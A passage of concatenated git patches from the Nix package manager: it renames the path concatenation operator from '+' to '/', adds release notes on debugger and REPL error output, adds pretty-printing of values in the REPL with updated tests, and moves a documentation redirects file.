*/ - auto modulesFile = path + ".gitmodules"; + auto modulesFile = path / ".gitmodules"; if (pathExists(modulesFile.abs())) info.submodules = parseSubmodules(modulesFile); diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index f9a1cb1bc..26fe79596 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -319,7 +319,7 @@ struct GitInputScheme : InputScheme if (!repoInfo.isLocal) throw Error("cannot commit '%s' to Git repository '%s' because it's not a working tree", path, input.to_string()); - writeFile((CanonPath(repoInfo.url) + path).abs(), contents); + writeFile((CanonPath(repoInfo.url) / path).abs(), contents); auto result = runProgram(RunOptions { .program = "git", @@ -680,7 +680,7 @@ struct GitInputScheme : InputScheme std::map> mounts; for (auto & submodule : repoInfo.workdirInfo.submodules) { - auto submodulePath = CanonPath(repoInfo.url) + submodule.path; + auto submodulePath = CanonPath(repoInfo.url) / submodule.path; fetchers::Attrs attrs; attrs.insert_or_assign("type", "git"); attrs.insert_or_assign("url", submodulePath.abs()); diff --git a/src/libfetchers/mercurial.cc b/src/libfetchers/mercurial.cc index 9982389ab..55e2eae03 100644 --- a/src/libfetchers/mercurial.cc +++ b/src/libfetchers/mercurial.cc @@ -141,7 +141,7 @@ struct MercurialInputScheme : InputScheme if (!isLocal) throw Error("cannot commit '%s' to Mercurial repository '%s' because it's not a working tree", path, input.to_string()); - auto absPath = CanonPath(repoPath) + path; + auto absPath = CanonPath(repoPath) / path; writeFile(absPath.abs(), contents); diff --git a/src/libfetchers/path.cc b/src/libfetchers/path.cc index f9b973320..d3b0e475d 100644 --- a/src/libfetchers/path.cc +++ b/src/libfetchers/path.cc @@ -84,7 +84,7 @@ struct PathInputScheme : InputScheme std::string_view contents, std::optional commitMsg) const override { - writeFile((CanonPath(getAbsPath(input)) + path).abs(), contents); + writeFile((CanonPath(getAbsPath(input)) / path).abs(), contents); } 
CanonPath getAbsPath(const Input & input) const diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc index ea1279e2e..189d1d305 100644 --- a/src/libstore/binary-cache-store.cc +++ b/src/libstore/binary-cache-store.cc @@ -235,14 +235,14 @@ ref BinaryCacheStore::addToStoreCommon( std::regex regex2("^[0-9a-f]{38}\\.debug$"); for (auto & [s1, _type] : narAccessor->readDirectory(buildIdDir)) { - auto dir = buildIdDir + s1; + auto dir = buildIdDir / s1; if (narAccessor->lstat(dir).type != SourceAccessor::tDirectory || !std::regex_match(s1, regex1)) continue; for (auto & [s2, _type] : narAccessor->readDirectory(dir)) { - auto debugPath = dir + s2; + auto debugPath = dir / s2; if (narAccessor->lstat(debugPath).type != SourceAccessor::tRegular || !std::regex_match(s2, regex2)) diff --git a/src/libstore/local-fs-store.cc b/src/libstore/local-fs-store.cc index 953f3a264..81c385ddb 100644 --- a/src/libstore/local-fs-store.cc +++ b/src/libstore/local-fs-store.cc @@ -28,7 +28,7 @@ struct LocalStoreAccessor : PosixSourceAccessor auto [storePath, rest] = store->toStorePath(path.abs()); if (requireValidPath && !store->isValidPath(storePath)) throw InvalidPath("path '%1%' is not a valid store path", store->printStorePath(storePath)); - return CanonPath(store->getRealStoreDir()) + storePath.to_string() + CanonPath(rest); + return CanonPath(store->getRealStoreDir()) / storePath.to_string() / CanonPath(rest); } std::optional maybeLstat(const CanonPath & path) override diff --git a/src/libstore/nar-accessor.cc b/src/libstore/nar-accessor.cc index b13e4c52c..cecf8148f 100644 --- a/src/libstore/nar-accessor.cc +++ b/src/libstore/nar-accessor.cc @@ -277,7 +277,7 @@ json listNar(ref accessor, const CanonPath & path, bool recurse) json &res2 = obj["entries"]; for (const auto & [name, type] : accessor->readDirectory(path)) { if (recurse) { - res2[name] = listNar(accessor, path + name, true); + res2[name] = listNar(accessor, path / name, true); } else res2[name] 
= json::object(); } diff --git a/src/libutil/archive.cc b/src/libutil/archive.cc index 6062392cd..b783b29e0 100644 --- a/src/libutil/archive.cc +++ b/src/libutil/archive.cc @@ -77,20 +77,20 @@ void SourceAccessor::dumpPath( std::string name(i.first); size_t pos = i.first.find(caseHackSuffix); if (pos != std::string::npos) { - debug("removing case hack suffix from '%s'", path + i.first); + debug("removing case hack suffix from '%s'", path / i.first); name.erase(pos); } if (!unhacked.emplace(name, i.first).second) throw Error("file name collision in between '%s' and '%s'", - (path + unhacked[name]), - (path + i.first)); + (path / unhacked[name]), + (path / i.first)); } else unhacked.emplace(i.first, i.first); for (auto & i : unhacked) - if (filter((path + i.first).abs())) { + if (filter((path / i.first).abs())) { sink << "entry" << "(" << "name" << i.first << "node"; - dump(path + i.second); + dump(path / i.second); sink << ")"; } } diff --git a/src/libutil/canon-path.cc b/src/libutil/canon-path.cc index 0a0f96a05..bf948be5d 100644 --- a/src/libutil/canon-path.cc +++ b/src/libutil/canon-path.cc @@ -63,7 +63,7 @@ void CanonPath::extend(const CanonPath & x) path += x.abs(); } -CanonPath CanonPath::operator + (const CanonPath & x) const +CanonPath CanonPath::operator / (const CanonPath & x) const { auto res = *this; res.extend(x); @@ -78,7 +78,7 @@ void CanonPath::push(std::string_view c) path += c; } -CanonPath CanonPath::operator + (std::string_view c) const +CanonPath CanonPath::operator / (std::string_view c) const { auto res = *this; res.push(c); diff --git a/src/libutil/canon-path.hh b/src/libutil/canon-path.hh index 997c8c731..fb2d9244b 100644 --- a/src/libutil/canon-path.hh +++ b/src/libutil/canon-path.hh @@ -190,14 +190,14 @@ public: /** * Concatenate two paths. */ - CanonPath operator + (const CanonPath & x) const; + CanonPath operator / (const CanonPath & x) const; /** * Add a path component to this one. It must not contain any slashes. 
*/ void push(std::string_view c); - CanonPath operator + (std::string_view c) const; + CanonPath operator / (std::string_view c) const; /** * Check whether access to this path is allowed, which is the case diff --git a/src/libutil/fs-sink.cc b/src/libutil/fs-sink.cc index b6f8db592..95b6088da 100644 --- a/src/libutil/fs-sink.cc +++ b/src/libutil/fs-sink.cc @@ -34,7 +34,7 @@ void copyRecursive( sink.createDirectory(to); for (auto & [name, _] : accessor.readDirectory(from)) { copyRecursive( - accessor, from + name, + accessor, from / name, sink, to + "/" + name); break; } diff --git a/src/libutil/git.cc b/src/libutil/git.cc index 3b8c3ebac..5733531fa 100644 --- a/src/libutil/git.cc +++ b/src/libutil/git.cc @@ -259,7 +259,7 @@ Mode dump( { Tree entries; for (auto & [name, _] : accessor.readDirectory(path)) { - auto child = path + name; + auto child = path / name; if (!filter(child.abs())) continue; auto entry = hook(child); diff --git a/src/libutil/source-path.cc b/src/libutil/source-path.cc index d85b0b7fe..341daf39c 100644 --- a/src/libutil/source-path.cc +++ b/src/libutil/source-path.cc @@ -41,11 +41,11 @@ std::optional SourcePath::getPhysicalPath() const std::string SourcePath::to_string() const { return accessor->showPath(path); } -SourcePath SourcePath::operator+(const CanonPath & x) const -{ return {accessor, path + x}; } +SourcePath SourcePath::operator / (const CanonPath & x) const +{ return {accessor, path / x}; } -SourcePath SourcePath::operator+(std::string_view c) const -{ return {accessor, path + c}; } +SourcePath SourcePath::operator / (std::string_view c) const +{ return {accessor, path / c}; } bool SourcePath::operator==(const SourcePath & x) const { diff --git a/src/libutil/source-path.hh b/src/libutil/source-path.hh index bf5625ca5..bde07b08f 100644 --- a/src/libutil/source-path.hh +++ b/src/libutil/source-path.hh @@ -89,14 +89,15 @@ struct SourcePath /** * Append a `CanonPath` to this path. 
*/ - SourcePath operator + (const CanonPath & x) const; + SourcePath operator / (const CanonPath & x) const; /** * Append a single component `c` to this path. `c` must not * contain a slash. A slash is implicitly added between this path * and `c`. */ - SourcePath operator+(std::string_view c) const; + SourcePath operator / (std::string_view c) const; + bool operator==(const SourcePath & x) const; bool operator!=(const SourcePath & x) const; bool operator<(const SourcePath & x) const; diff --git a/src/nix-env/nix-env.cc b/src/nix-env/nix-env.cc index d5b46c57a..dfc6e70eb 100644 --- a/src/nix-env/nix-env.cc +++ b/src/nix-env/nix-env.cc @@ -97,7 +97,7 @@ static bool isNixExpr(const SourcePath & path, struct InputAccessor::Stat & st) { return st.type == InputAccessor::tRegular - || (st.type == InputAccessor::tDirectory && (path + "default.nix").resolveSymlinks().pathExists()); + || (st.type == InputAccessor::tDirectory && (path / "default.nix").resolveSymlinks().pathExists()); } @@ -116,7 +116,7 @@ static void getAllExprs(EvalState & state, are implemented using profiles). 
*/ if (i == "manifest.nix") continue; - auto path2 = (path + i).resolveSymlinks(); + auto path2 = (path / i).resolveSymlinks(); InputAccessor::Stat st; try { diff --git a/src/nix/ls.cc b/src/nix/ls.cc index 231456c9c..63f97f2d3 100644 --- a/src/nix/ls.cc +++ b/src/nix/ls.cc @@ -72,7 +72,7 @@ struct MixLs : virtual Args, MixJSON if (st.type == SourceAccessor::Type::tDirectory && !showDirectory) { auto names = accessor->readDirectory(curPath); for (auto & [name, type] : names) - showFile(curPath + name, relPath + "/" + name); + showFile(curPath / name, relPath + "/" + name); } else showFile(curPath, relPath); }; diff --git a/src/nix/run.cc b/src/nix/run.cc index 9bca5b9d0..e86837679 100644 --- a/src/nix/run.cc +++ b/src/nix/run.cc @@ -124,7 +124,7 @@ struct CmdShell : InstallablesCommand, MixEnvironment if (true) pathAdditions.push_back(store->printStorePath(path) + "/bin"); - auto propPath = CanonPath(store->printStorePath(path)) + "nix-support" + "propagated-user-env-packages"; + auto propPath = CanonPath(store->printStorePath(path)) / "nix-support" / "propagated-user-env-packages"; if (auto st = accessor->maybeLstat(propPath); st && st->type == SourceAccessor::tRegular) { for (auto & p : tokenizeString(accessor->readFile(propPath))) todo.push(store->parseStorePath(p)); diff --git a/src/nix/why-depends.cc b/src/nix/why-depends.cc index aecf65922..e299585ff 100644 --- a/src/nix/why-depends.cc +++ b/src/nix/why-depends.cc @@ -225,7 +225,7 @@ struct CmdWhyDepends : SourceExprCommand, MixOperateOnOptions if (st->type == SourceAccessor::Type::tDirectory) { auto names = accessor->readDirectory(p); for (auto & [name, type] : names) - visitPath(p + name); + visitPath(p / name); } else if (st->type == SourceAccessor::Type::tRegular) { diff --git a/tests/unit/libutil/canon-path.cc b/tests/unit/libutil/canon-path.cc index fc94ccc3d..bf11abe3e 100644 --- a/tests/unit/libutil/canon-path.cc +++ b/tests/unit/libutil/canon-path.cc @@ -80,29 +80,29 @@ namespace nix { { CanonPath 
p1("a//foo/bar//"); CanonPath p2("xyzzy/bla"); - ASSERT_EQ((p1 + p2).abs(), "/a/foo/bar/xyzzy/bla"); + ASSERT_EQ((p1 / p2).abs(), "/a/foo/bar/xyzzy/bla"); } { CanonPath p1("/"); CanonPath p2("/a/b"); - ASSERT_EQ((p1 + p2).abs(), "/a/b"); + ASSERT_EQ((p1 / p2).abs(), "/a/b"); } { CanonPath p1("/a/b"); CanonPath p2("/"); - ASSERT_EQ((p1 + p2).abs(), "/a/b"); + ASSERT_EQ((p1 / p2).abs(), "/a/b"); } { CanonPath p("/foo/bar"); - ASSERT_EQ((p + "x").abs(), "/foo/bar/x"); + ASSERT_EQ((p / "x").abs(), "/foo/bar/x"); } { CanonPath p("/"); - ASSERT_EQ((p + "foo" + "bar").abs(), "/foo/bar"); + ASSERT_EQ((p / "foo" / "bar").abs(), "/foo/bar"); } } From 24205a87039cab89e6efcd6ec7d62de1c2c3b51f Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 13:00:39 -0800 Subject: [PATCH 399/654] Add release note --- ...-location-in-while-evaluating-attribute.md | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 doc/manual/rl-next/source-location-in-while-evaluating-attribute.md diff --git a/doc/manual/rl-next/source-location-in-while-evaluating-attribute.md b/doc/manual/rl-next/source-location-in-while-evaluating-attribute.md new file mode 100644 index 000000000..0e0b74c5a --- /dev/null +++ b/doc/manual/rl-next/source-location-in-while-evaluating-attribute.md @@ -0,0 +1,23 @@ +--- +synopsis: "In the debugger, `while evaluating the attribute` errors now include position information" +prs: 9915 +--- + +Before: + +``` +0: while evaluating the attribute 'python311.pythonForBuild.pkgs' +0x600001522598 +``` + +After: + +``` +0: while evaluating the attribute 'python311.pythonForBuild.pkgs' +/nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27 + + 131| + 132| bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs; + | ^ + 133| in +``` From 601fc7d15978827a04a1bc44e92a8a42a512f50a Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 13:13:26 -0800 Subject: [PATCH 400/654] Add release note --- 
...debugger-more-reliably-in-let-and-calls.md | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md diff --git a/doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md b/doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md new file mode 100644 index 000000000..c93225816 --- /dev/null +++ b/doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md @@ -0,0 +1,25 @@ +--- +synopsis: The `--debugger` will start more reliably in `let` expressions and function calls +prs: 9917 +issues: 6649 +--- + +Previously, if you attempted to evaluate this file with the debugger: + +```nix +let + a = builtins.trace "before inner break" ( + builtins.break "hello" + ); + b = builtins.trace "before outer break" ( + builtins.break a + ); +in + b +``` + +Nix would correctly enter the debugger at `builtins.break a`, but if you asked +it to `:continue`, it would skip over the `builtins.break "hello"` expression +entirely. + +Now, Nix will correctly enter the debugger at both breakpoints. From b63a8d7c46e7a59c3e133c94af24dfcf517fe50b Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 13:15:29 -0800 Subject: [PATCH 401/654] Add release note --- .../rl-next/debugger-locals-for-let-expressions.md | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 doc/manual/rl-next/debugger-locals-for-let-expressions.md diff --git a/doc/manual/rl-next/debugger-locals-for-let-expressions.md b/doc/manual/rl-next/debugger-locals-for-let-expressions.md new file mode 100644 index 000000000..736208724 --- /dev/null +++ b/doc/manual/rl-next/debugger-locals-for-let-expressions.md @@ -0,0 +1,9 @@ +--- +synopsis: "`--debugger` can now access bindings from `let` expressions" +prs: 9918 +issues: 8827 +--- + +Breakpoints and errors in the bindings of a `let` expression can now access +those bindings in the debugger. 
Previously, only the body of `let` expressions +could access those bindings. From 155bc761f601346c8113cc760aaf26306136403c Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 13:16:39 -0800 Subject: [PATCH 402/654] Add release note --- doc/manual/rl-next/reduce-debugger-clutter.md | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 doc/manual/rl-next/reduce-debugger-clutter.md diff --git a/doc/manual/rl-next/reduce-debugger-clutter.md b/doc/manual/rl-next/reduce-debugger-clutter.md new file mode 100644 index 000000000..9bc902eee --- /dev/null +++ b/doc/manual/rl-next/reduce-debugger-clutter.md @@ -0,0 +1,37 @@ +--- +synopsis: "Visual clutter in `--debugger` is reduced" +prs: 9919 +--- + +Before: +``` +info: breakpoint reached + + +Starting REPL to allow you to inspect the current state of the evaluator. + +Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help. + +nix-repl> :continue +error: uh oh + + +Starting REPL to allow you to inspect the current state of the evaluator. + +Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help. + +nix-repl> +``` + +After: + +``` +info: breakpoint reached + +Nix 2.20.0pre20231222_dirty debugger +Type :? for help. 
+nix-repl> :continue +error: uh oh + +nix-repl> +``` From 657a6078121bf08525e9cd286c6f8887e983a22e Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 13:21:08 -0800 Subject: [PATCH 403/654] Add release note --- .../rl-next/better-errors-in-nix-repl.md | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 doc/manual/rl-next/better-errors-in-nix-repl.md diff --git a/doc/manual/rl-next/better-errors-in-nix-repl.md b/doc/manual/rl-next/better-errors-in-nix-repl.md new file mode 100644 index 000000000..4deaa8c70 --- /dev/null +++ b/doc/manual/rl-next/better-errors-in-nix-repl.md @@ -0,0 +1,40 @@ +--- +synopsis: Concise error printing in `nix repl` +prs: 9928 +--- + +Previously, if an element of a list or attribute set threw an error while +evaluating, `nix repl` would print the entire error (including source location +information) inline. This output was clumsy and difficult to parse: + +``` +nix-repl> { err = builtins.throw "uh oh!"; } +{ err = «error: + … while calling the 'throw' builtin + at «string»:1:9: + 1| { err = builtins.throw "uh oh!"; } + | ^ + + error: uh oh!»; } +``` + +Now, only the error message is displayed, making the output much more readable. +``` +nix-repl> { err = builtins.throw "uh oh!"; } +{ err = «error: uh oh!»; } +``` + +However, if the whole expression being evaluated throws an error, source +locations and (if applicable) a stack trace are printed, just like you'd expect: + +``` +nix-repl> builtins.throw "uh oh!" +error: + … while calling the 'throw' builtin + at «string»:1:1: + 1| builtins.throw "uh oh!" + | ^ + + error: uh oh! +``` + From c0a15fb7d03dfb8f53bc6726c414bc88aa362592 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sun, 4 Feb 2024 00:40:30 -0800 Subject: [PATCH 404/654] Pretty-print values in the REPL Pretty-print values in the REPL by printing each item in a list or attrset on a separate line. 
When possible, single-item lists and attrsets are printed on one line, as long as they don't contain a nested list, attrset, or thunk. Before: ``` { attrs = { a = { b = { c = { }; }; }; }; list = [ 1 ]; list' = [ 1 2 3 ]; } ``` After: ``` { attrs = { a = { b = { c = { }; }; }; }; list = [ 1 ]; list' = [ 1 2 3 ]; } ``` --- src/libcmd/repl.cc | 3 +- src/libexpr/print-options.hh | 22 ++++ src/libexpr/print.cc | 114 ++++++++++++++++-- ...al-fail-bad-string-interpolation-4.err.exp | 2 +- tests/functional/repl.sh | 69 ++++++++++- tests/unit/libexpr/value/print.cc | 8 +- 6 files changed, 195 insertions(+), 23 deletions(-) diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index d7af15153..2c64bd7a6 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -101,7 +101,8 @@ struct NixRepl .ansiColors = true, .force = true, .derivationPaths = true, - .maxDepth = maxDepth + .maxDepth = maxDepth, + .prettyIndent = 2 }); } }; diff --git a/src/libexpr/print-options.hh b/src/libexpr/print-options.hh index e03746ece..94767df9c 100644 --- a/src/libexpr/print-options.hh +++ b/src/libexpr/print-options.hh @@ -17,24 +17,29 @@ struct PrintOptions * If true, output ANSI color sequences. */ bool ansiColors = false; + /** * If true, force values. */ bool force = false; + /** * If true and `force` is set, print derivations as * `«derivation /nix/store/...»` instead of as attribute sets. */ bool derivationPaths = false; + /** * If true, track which values have been printed and skip them on * subsequent encounters. Useful for self-referential values. */ bool trackRepeated = true; + /** * Maximum depth to evaluate to. */ size_t maxDepth = std::numeric_limits::max(); + /** * Maximum number of attributes in attribute sets to print. * @@ -42,6 +47,7 @@ struct PrintOptions * attribute set encountered. */ size_t maxAttrs = std::numeric_limits::max(); + /** * Maximum number of list items to print. * @@ -49,10 +55,26 @@ struct PrintOptions * list encountered. 
*/ size_t maxListItems = std::numeric_limits::max(); + /** * Maximum string length to print. */ size_t maxStringLength = std::numeric_limits::max(); + + /** + * Indentation width for pretty-printing. + * + * If set to 0 (the default), values are not pretty-printed. + */ + size_t prettyIndent = 0; + + /** + * True if pretty-printing is enabled. + */ + inline bool prettyPrint() + { + return prettyIndent > 0; + } }; /** diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 68d381033..1ff026b3d 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -153,6 +153,7 @@ struct ImportantFirstAttrNameCmp }; typedef std::set ValuesSeen; +typedef std::vector> AttrVec; class Printer { @@ -163,6 +164,21 @@ private: std::optional seen; size_t attrsPrinted = 0; size_t listItemsPrinted = 0; + std::string indent; + + void increaseIndent() + { + if (options.prettyPrint()) { + indent.append(options.prettyIndent, ' '); + } + } + + void decreaseIndent() + { + if (options.prettyPrint()) { + indent.resize(indent.size() - options.prettyIndent); + } + } void printRepeated() { @@ -260,6 +276,28 @@ private: } } + bool shouldPrettyPrintAttrs(AttrVec & v) + { + if (!options.prettyPrint() || v.empty()) { + return false; + } + + // Pretty-print attrsets with more than one item. + if (v.size() > 1) { + return true; + } + + auto item = v[0].second; + if (!item) { + return true; + } + + // Pretty-print single-item attrsets only if they contain nested + // structures. 
+ auto itemType = item->type(); + return itemType == nList || itemType == nAttrs || itemType == nThunk; + } + void printAttrs(Value & v, size_t depth) { if (seen && !seen->insert(v.attrs).second) { @@ -270,9 +308,10 @@ private: if (options.force && options.derivationPaths && state.isDerivation(v)) { printDerivation(v); } else if (depth < options.maxDepth) { - output << "{ "; + increaseIndent(); + output << "{"; - std::vector> sorted; + AttrVec sorted; for (auto & i : *v.attrs) sorted.emplace_back(std::pair(state.symbols[i.name], i.value)); @@ -281,7 +320,15 @@ private: else std::sort(sorted.begin(), sorted.end(), ImportantFirstAttrNameCmp()); + auto prettyPrint = shouldPrettyPrintAttrs(sorted); + for (auto & i : sorted) { + if (prettyPrint) { + output << "\n" << indent; + } else { + output << " "; + } + if (attrsPrinted >= options.maxAttrs) { printElided(sorted.size() - attrsPrinted, "attribute", "attributes"); break; @@ -290,13 +337,42 @@ private: printAttributeName(output, i.first); output << " = "; print(*i.second, depth + 1); - output << "; "; + output << ";"; attrsPrinted++; } + decreaseIndent(); + if (prettyPrint) { + output << "\n" << indent; + } else { + output << " "; + } output << "}"; - } else + } else { output << "{ ... }"; + } + } + + bool shouldPrettyPrintList(std::span list) + { + if (!options.prettyPrint() || list.empty()) { + return false; + } + + // Pretty-print lists with more than one item. + if (list.size() > 1) { + return true; + } + + auto item = list[0]; + if (!item) { + return true; + } + + // Pretty-print single-item lists only if they contain nested + // structures. 
+ auto itemType = item->type(); + return itemType == nList || itemType == nAttrs || itemType == nThunk; } void printList(Value & v, size_t depth) @@ -306,11 +382,20 @@ private: return; } - output << "[ "; if (depth < options.maxDepth) { - for (auto elem : v.listItems()) { + increaseIndent(); + output << "["; + auto listItems = v.listItems(); + auto prettyPrint = shouldPrettyPrintList(listItems); + for (auto elem : listItems) { + if (prettyPrint) { + output << "\n" << indent; + } else { + output << " "; + } + if (listItemsPrinted >= options.maxListItems) { - printElided(v.listSize() - listItemsPrinted, "item", "items"); + printElided(listItems.size() - listItemsPrinted, "item", "items"); break; } @@ -319,13 +404,19 @@ private: } else { printNullptr(); } - output << " "; listItemsPrinted++; } + + decreaseIndent(); + if (prettyPrint) { + output << "\n" << indent; + } else { + output << " "; + } + output << "]"; + } else { + output << "[ ... ]"; } - else - output << "... "; - output << "]"; } void printFunction(Value & v) @@ -488,6 +579,7 @@ public: { attrsPrinted = 0; listItemsPrinted = 0; + indent.clear(); if (options.trackRepeated) { seen.emplace(); diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp index 5119238d7..6f907106b 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp @@ -6,4 +6,4 @@ error: | ^ 10| - error: cannot coerce a set to a string: { a = { a = { a = { a = "ha"; b = "ha"; c = "ha"; d = "ha"; e = "ha"; f = "ha"; g = "ha"; h = "ha"; j = "ha"; }; «4294967295 attributes elided»}; «4294967294 attributes elided»}; «4294967293 attributes elided»} + error: cannot coerce a set to a string: { a = { a = { a = { a = "ha"; b = "ha"; c = "ha"; d = "ha"; e = "ha"; f = "ha"; g = "ha"; h = "ha"; j = "ha"; }; «4294967295 attributes elided» }; «4294967294 attributes elided» 
}; «4294967293 attributes elided» } diff --git a/tests/functional/repl.sh b/tests/functional/repl.sh index 5f399aa44..4938c2267 100644 --- a/tests/functional/repl.sh +++ b/tests/functional/repl.sh @@ -146,29 +146,86 @@ echo "$replResult" | grepQuiet -s afterChange # Normal output should print attributes in lexicographical order non-recursively testReplResponseNoRegex ' { a = { b = 2; }; l = [ 1 2 3 ]; s = "string"; n = 1234; x = rec { y = { z = { inherit y; }; }; }; } -' '{ a = { ... }; l = [ ... ]; n = 1234; s = "string"; x = { ... }; }' +' \ +'{ + a = { ... }; + l = [ ... ]; + n = 1234; + s = "string"; + x = { ... }; +} +' # Same for lists, but order is preserved testReplResponseNoRegex ' [ 42 1 "thingy" ({ a = 1; }) ([ 1 2 3 ]) ] -' '[ 42 1 "thingy" { ... } [ ... ] ]' +' \ +'[ + 42 + 1 + "thingy" + { ... } + [ ... ] +] +' # Same for let expressions testReplResponseNoRegex ' let x = { y = { a = 1; }; inherit x; }; in x -' '{ x = «repeated»; y = { ... }; }' +' \ +'{ + x = { ... }; + y = { ... 
}; +} +' # The :p command should recursively print sets, but prevent infinite recursion testReplResponseNoRegex ' :p { a = { b = 2; }; s = "string"; n = 1234; x = rec { y = { z = { inherit y; }; }; }; } -' '{ a = { b = 2; }; n = 1234; s = "string"; x = { y = { z = { y = «repeated»; }; }; }; }' +' \ +'{ + a = { b = 2; }; + n = 1234; + s = "string"; + x = { + y = { + z = { + y = «repeated»; + }; + }; + }; +} +' # Same for lists testReplResponseNoRegex ' :p [ 42 1 "thingy" (rec { a = 1; b = { inherit a; inherit b; }; }) ([ 1 2 3 ]) ] -' '[ 42 1 "thingy" { a = 1; b = { a = 1; b = «repeated»; }; } [ 1 2 3 ] ]' +' \ +'[ + 42 + 1 + "thingy" + { + a = 1; + b = { + a = 1; + b = «repeated»; + }; + } + [ + 1 + 2 + 3 + ] +] +' # Same for let expressions testReplResponseNoRegex ' :p let x = { y = { a = 1; }; inherit x; }; in x -' '{ x = «repeated»; y = { a = 1; }; }' +' \ +'{ + x = «repeated»; + y = { a = 1 }; +} +' diff --git a/tests/unit/libexpr/value/print.cc b/tests/unit/libexpr/value/print.cc index c4264a38d..db1e4f3a3 100644 --- a/tests/unit/libexpr/value/print.cc +++ b/tests/unit/libexpr/value/print.cc @@ -756,7 +756,7 @@ TEST_F(ValuePrintingTests, ansiColorsAttrsElided) vAttrs.mkAttrs(builder.finish()); test(vAttrs, - "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT "«1 attribute elided»" ANSI_NORMAL "}", + "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT "«1 attribute elided»" ANSI_NORMAL " }", PrintOptions { .ansiColors = true, .maxAttrs = 1 @@ -769,7 +769,7 @@ TEST_F(ValuePrintingTests, ansiColorsAttrsElided) vAttrs.mkAttrs(builder.finish()); test(vAttrs, - "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT "«2 attributes elided»" ANSI_NORMAL "}", + "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT "«2 attributes elided»" ANSI_NORMAL " }", PrintOptions { .ansiColors = true, .maxAttrs = 1 @@ -793,7 +793,7 @@ TEST_F(ValuePrintingTests, ansiColorsListElided) vList.bigList.size = 2; test(vList, - "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«1 item 
elided»" ANSI_NORMAL "]", + "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«1 item elided»" ANSI_NORMAL " ]", PrintOptions { .ansiColors = true, .maxListItems = 1 @@ -806,7 +806,7 @@ TEST_F(ValuePrintingTests, ansiColorsListElided) vList.bigList.size = 3; test(vList, - "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«2 items elided»" ANSI_NORMAL "]", + "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«2 items elided»" ANSI_NORMAL " ]", PrintOptions { .ansiColors = true, .maxListItems = 1 From 2d74b56aee84051d386f124c092d143b9cc437f9 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Tue, 6 Feb 2024 23:22:34 +0100 Subject: [PATCH 405/654] fix location of `_redirects` file the Netlify `_redirects` file must be in the root directory [0] of the files to serve, and mdBook copies all the files in `src` that aren't `.md` to the output directory [1]. [0]: https://docs.netlify.com/routing/redirects/ [1]: https://rust-lang.github.io/mdBook/guide/creating.html#source-files --- doc/manual/{ => src}/_redirects | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename doc/manual/{ => src}/_redirects (100%) diff --git a/doc/manual/_redirects b/doc/manual/src/_redirects similarity index 100% rename from doc/manual/_redirects rename to doc/manual/src/_redirects From 474fc4078acbe062fcc31ce91c69c8f33bf00d5f Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Tue, 6 Feb 2024 16:49:28 -0800 Subject: [PATCH 406/654] Add comments --- src/libexpr/eval-error.cc | 2 +- src/libexpr/eval-error.hh | 30 ++++++++---------------------- 2 files changed, 9 insertions(+), 23 deletions(-) diff --git a/src/libexpr/eval-error.cc b/src/libexpr/eval-error.cc index b9411cbf4..250c59a19 100644 --- a/src/libexpr/eval-error.cc +++ b/src/libexpr/eval-error.cc @@ -91,7 +91,7 @@ void EvalErrorBuilder::debugThrow() // `EvalState` is the only class that can construct an `EvalErrorBuilder`, // and it does so in dynamic storage. 
